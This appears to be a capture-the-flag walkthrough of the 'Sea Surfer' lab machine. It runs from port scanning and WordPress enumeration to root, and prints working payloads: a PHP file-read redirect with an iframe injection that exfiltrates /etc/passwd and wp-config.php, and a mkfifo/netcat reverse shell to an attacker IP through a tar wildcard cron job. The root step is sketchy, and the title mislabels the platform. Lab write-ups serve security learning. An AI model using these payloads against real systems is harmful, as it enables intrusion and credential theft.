Sea CTF HackTheBox Walkthrough: A Step-by-Step Guide to Cracking the Challenge

Here’s your walkthrough for the “Sea CTF HackTheBox” under your name:

---

SCANNING

Port Scanning

We begin by scanning all ports on the target machine:

nmap -A -p- --min-rate 20000 10.10.165.149

Open Ports:

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

SSH and HTTP are running. We’ll start by looking at the web service.

ENUMERATION

Manual Enumeration

Checking port 80 reveals a HTTP service with a notable header for “X-Backend-Server”:

curl -I http://10.10.165.149/

Response:

X-Backend-Server: seasurfer.thm

I added seasurfer.thm to /etc/hosts. The vhost turns out to be a WordPress site about a surfer shop. The “About” page lists employees, including Kyle, the sysadmin. Kyle appears to be a good candidate for further investigation, as indicated by the footer “Made by Kyle! ❤”.

WordPress Enumeration

Running wpscan reveals Kyle as a potential username:

wpscan --url http://seasurfer.thm/ -e u

[+] User Found: kyle

Directory Enumeration

Using gobuster, I find an interesting directory:

gobuster dir -u http://seasurfer.thm/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 30

/adminer  (Status: 301)

Subdomain Enumeration

Subdomain enumeration with ffuf shows:

ffuf -v -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://seasurfer.thm -H "Host: FUZZ.seasurfer.thm"

internal.seasurfer.thm

Adding this subdomain to /etc/hosts reveals a page generating PDFs. Let’s check if it’s vulnerable to HTML injection by adding HTML to the comment field.

PDF Metadata

Checking the PDF metadata using exiftool:

exiftool /root/Downloads/20082022-6TL7eVCWqFKcL7bEVbdc.pdf

The response shows the PDF is generated by wkhtmltopdf, which may be vulnerable to SSRF and LFI.

EXPLOITATION

LFI Exploit

I create a PHP script to exfiltrate files:

<?php header('location:file://'.$_REQUEST['x']); ?>

Hosting it locally, I inject the payload into the receipt generation form:

<iframe src="http://10.8.88.207:9001/exfiltrate.php?x=/etc/passwd"></iframe>

This successfully retrieves /etc/passwd. Then, I target /var/www/wordpress/wp-config.php to get database credentials.

Adminer Login

Using the credentials on the adminer page:

seasurfer.thm/adminer/

I successfully log in and retrieve Kyle’s hashed password. Using hashcat and rockyou.txt, I brute force the hash:

hashcat -m 400 kyli_hash /usr/share/wordlists/rockyou.txt

With the cracked password, I log in as Kyle on WordPress.

Reverse Shell

I place a PHP reverse shell in the 404 template and trigger it:

nc -lvnp 444

I get access as www-data.

PRIVILEGE ESCALATION

User Privilege Escalation

I find a backup script in /var/www/internal/maintenance that runs every minute. Exploiting a wildcard vulnerability in tar, I craft a reverse shell payload:

echo "mkfifo /tmp/lhennp; nc 10.8.88.207 5555 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh

Once executed, I get a reverse shell as Kyle.

Root Privilege Escalation

By exploiting pam_ssh_agent_auth, I gain root access:

sudo su

Finally, I read the root.txt flag:

cat /root/root.txt

---

Congratulations! You’ve completed the room.